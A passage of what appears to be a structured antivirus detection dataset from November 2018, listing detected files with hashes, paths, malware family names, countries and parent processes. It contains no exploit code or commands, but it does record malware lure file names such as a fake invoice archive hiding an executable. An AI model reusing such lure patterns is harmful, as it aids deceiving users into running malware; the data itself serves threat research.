  Row(detection=Row(filename="inv_159436263_from_kunde, d'amore and doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filepath="Inv_159436263_from_Kunde, D'Amore and Doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filesize=64000, name='TR/Dldr.Upatre.SN.#M0.#R0'), hash='ff176cdf9d3ab8f5f26c86f1da545ff3608187001ecbb3225703823e8a9d4722', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:45:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Dokumen KOPRASAI\\Prog_LPD\\Prog_LPD\\Exeprog-mdk\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='fa1a9d3e8ac10ce5554f928fbc6eee0a8641f40324e5e9a1b3218c72eb3473de', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:30:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124024-9504ac2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dc0dc155\\AVSCAN-20181104-124006-91CE2DFF\\AVSCAN-20181104-124024-9504AC2B', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:40:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='server.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\InstallDir\\Server.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R273'), hash='fe4029696947def84af9e7b0df0557224dd01413779c35c1cd51941193ffa789', metadata=Row(cmdline='\\\\\\/3', country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\Taskmgr.exe', parentsize=1135352, timestamp='2018-11-04T03:29:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T10:34:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msvcrmtk.dll', filepath='E:\\PACM00_11_A.11_180410_A7D06FC5\\1111\\刷机工具\\MSVCRMTK.DLL', filesize=192000, name='TR/Black.Gen2.#M300.#R100338'), hash='fff0bae1269aaf7bf1db339362c218ba9a2a9512b06a583eb281fd59858bead7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:29:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131101-5bda6417', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6bdb048\\AVSCAN-20181101-131043-59F44501\\AVSCAN-20181101-131101-5BDA6417', filesize=384000, name='W2000M/Ramnit.A.#M1.#R1'), hash='feceb360e0dbc19bfab0608db069babb1196286d8dce8f436f3d44ff1ae74ec7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:02Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:08:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-4\\18E83D8D6C9B76BB9F9F63CB86479D711663D31F4EBEA678236ADB8C0DD59B4E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='18e83d8d6c9b76bb9f9f63cb86479d711663d31f4ebea678236adb8c0dd59b4e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:23:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163147-fa833884', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_731bb7c6\\AVSCAN-20181102-163137-F8981695\\AVSCAN-20181102-163147-FA833884', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2012整村脱贫村附表1-4_重命名_2013-10-29-15-0-3.xls', filepath='F:\\工作\\梅江资料\\农服中心\\2\\2012整村脱贫村附表1-4_重命名_2013-10-29-15-0-3.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='5254c4400294e2e1ed706fb6c8456b3c2a52fee938263940972eb9fa82815a5f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:17:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163403-386d3bf9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51e48288\\AVSCAN-20181102-162523-FF062695\\AVSCAN-20181102-163403-386D3BF9', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='6e9c3110983d6c846b9ab589845634b60e3ca074062f6112f6be6e0e6d2f3114', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T09:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=324608, timestamp='2018-11-02T00:57:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tabungan gabung juni 11.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2011\\NOM TABUNGAN GABUNG JUNI 11\\TABUNGAN GABUNG JUNI 11.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153043-ff186f74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-153015-FA538386\\AVSCAN-20181102-153043-FF186F74', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T07:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='danh sách cán bộ.exe', filepath='H:\\\xa0\\danh sách cán bộ.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='6bec22bb60acd389fcc3f637a290f11b089a27eadac451fe57616460d537aa47', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:25:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Transtool\\Unwise.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='085055e90c76f7bcfbc46a1295c53fcb58ab0a1953ac7fe118c7261314a6d766', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T02:59:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='radihe.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\NOFEGU~1\\radihe.exe', filesize=640000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='08e14ee377b465b312b01cd174f003291c3dfd427fa2ae10116bebd176f809c5', metadata=Row(cmdline='\\/Check', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T21:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155846-e532d1f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155846-E532D1F3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T12:59:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:09:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Documents and Settings\\X\\Configuración local\\Temp\\tmp9259453\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:29:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='D:\\PC GAMER\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh3.zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1531856, timestamp='2018-11-02T00:57:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tnkge.dll', filepath='D:\\MariaDB\\lib\\plugin\\tnkge.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='27bcd2ea9456476b7ab0881ee7704d030721b09856caa463554d383754cd40e6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T22:29:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\C-GEO\\bin\\transfer.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:29:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:f7byY\\\\\\/G42EOSw8wg.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T03:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084742-8aad5ce2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084731-89063051\\AVSCAN-20181102-084742-8AAD5CE2', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patch.exe', filepath='g:\\برامج\\net program\\idm\\new.p\\باتشات قديمة\\Patch.exe', filesize=448000, name='W32/Sality.AT.#M1.#R1'), hash='3a774cacb919d9ee5b17a3b3198817f2191d0b0beb6cea2fc8a135aa67328f46', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:56:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\ajaxScrollerMediafireJoomla\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T18:04:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:44:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yolo.dll', filepath='ProgramFilesDir/[PluginsDir]/yolo.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='46afe34ef9bcc3e2d76bd85f73235cabd22982b29ac85e5b8415ecb72fb10760', metadata=Row(cmdline=None, country='ES', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:48:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171150-d159c31a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836e581e\\AVSCAN-20181102-171139-CF7A72FB\\AVSCAN-20181102-171150-D159C31A', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053109-7927f230', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053109-7927F230', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104818-593bdfd7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-104746-534354B7\\AVSCAN-20181102-104818-593BDFD7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051546-530fab04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051546-530FAB04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:45Z'), dt=datetime.date(2018, 11, 2)),
